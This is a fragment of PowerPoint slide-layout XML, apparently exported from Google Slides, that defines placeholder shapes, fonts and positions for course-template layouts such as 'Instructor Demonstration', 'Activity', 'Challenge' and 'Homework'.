            <a:endParaRPr sz="60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5. Subsection Slide">
  <p:cSld name="CUSTOM_17_2_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325"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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>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95" name="Google Shape;95;p18"/>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lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="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97" name="Google Shape;97;p1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6. Transition Slide">
  <p:cSld name="CUSTOM_17_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 98"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100" y="2088475"/>
            <a:ext cx="8595300" cy="7923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600">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p1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2" name="Google Shape;102;p19"/>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7. Text Only">
  <p:cSld name="CUSTOM_2_7_2">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5" name="Google Shape;105;p2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6" name="Google Shape;106;p2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7" name="Google Shape;107;p2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8" name="Google Shape;108;p2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9" name="Google Shape;109;p2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0" name="Google Shape;110;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="35817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8. Text with Sidebar">
  <p:cSld name="CUSTOM_2_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 111"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="Google Shape;112;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="119" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7048950" y="910275"/>
            <a:ext cx="1828800" cy="3784798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Google Shape;113;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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4" name="Google Shape;114;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="38976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15" name="Google Shape;115;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0"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6" name="Google Shape;116;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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17" name="Google Shape;117;p2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18" name="Google Shape;118;p2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p2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20" name="Google Shape;120;p21"/>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9. Call Attention Slide">
  <p:cSld name="CUSTOM_2_3_1_1_3_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 121"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="274881"/>
            <a:ext cx="8595360" cy="4593742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544050" y="1545675"/>
            <a:ext cx="5770200" cy="24309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None/>
              <a:defRPr sz="36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24" name="Google Shape;124;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="139" r="149"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258175" y="1332825"/>
            <a:ext cx="1371601" cy="2002535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p2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26" name="Google Shape;126;p22"/>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10. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 127"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Google Shape;128;p23"/>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29" name="Google Shape;129;p23"/>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3"/>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32" name="Google Shape;132;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242550" y="3895344"/>
            <a:ext cx="8907900" cy="427500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="914400" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Instructor Demonstration</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p23"/>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34" name="Google Shape;134;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="409963" y="-228600"/>
            <a:ext cx="8535272" cy="4064423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4387000"/>
            <a:ext cx="9251400" cy="482100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="914400"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11. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 136"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="Google Shape;137;p24"/>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38" name="Google Shape;138;p24"/>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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062160" y="3975150"/>
            <a:ext cx="548640" cy="725893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p24"/>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1" name="Google Shape;141;p24"/>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2" name="Google Shape;142;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899000" y="1133363"/>
            <a:ext cx="1737360" cy="1911096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p2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44" name="Google Shape;144;p24"/>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45" name="Google Shape;145;p24"/>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46" name="Google Shape;146;p24"/>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12. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 147"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="Google Shape;148;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275625" y="4154800"/>
            <a:ext cx="594361" cy="653795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p2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50" name="Google Shape;150;p2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51" name="Google Shape;151;p2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2" name="Google Shape;152;p2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3" name="Google Shape;153;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p2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55" name="Google Shape;155;p25"/>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56" name="Google Shape;156;p25"/>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13. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 157"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="158" name="Google Shape;158;p26"/>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59" name="Google Shape;159;p26"/>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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062160" y="3975150"/>
            <a:ext cx="548640" cy="725893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p2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62" name="Google Shape;162;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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3" name="Google Shape;163;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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4" name="Google Shape;164;p26"/>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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p26"/>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66" name="Google Shape;166;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="-595025"/>
            <a:ext cx="2950353" cy="5143500"/>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14. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 167"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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69" name="Google Shape;169;p2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70" name="Google Shape;170;p2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71" name="Google Shape;171;p27"/>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72" name="Google Shape;172;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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73" name="Google Shape;173;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>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74" name="Google Shape;174;p2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75" name="Google Shape;175;p27"/>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76" name="Google Shape;176;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8213200" y="3862850"/>
            <a:ext cx="656773" cy="1144971"/>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15. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 177"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Google Shape;178;p28"/>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79" name="Google Shape;179;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7350" y="0"/>
            <a:ext cx="9157800" cy="274500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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0" name="Google Shape;180;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="209"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858369" y="1097625"/>
            <a:ext cx="1737361" cy="1980591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="3807100"/>
            <a:ext cx="8596200" cy="1062000"/>
          </a:xfrm>
          <a:prstGeom prst="re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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062160" y="3975150"/>
            <a:ext cx="548640" cy="725893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p2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84" name="Google Shape;184;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4234600"/>
            <a:ext cx="8970300" cy="634500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="1005825" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>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5" name="Google Shape;185;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="3943225"/>
            <a:ext cx="7658400" cy="3309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300" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p2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87" name="Google Shape;187;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="1042875"/>
            <a:ext cx="8595300" cy="2764200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2560300" tIns="0" rIns="457200" bIns="457200" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="24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1800">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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16. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 188"/>
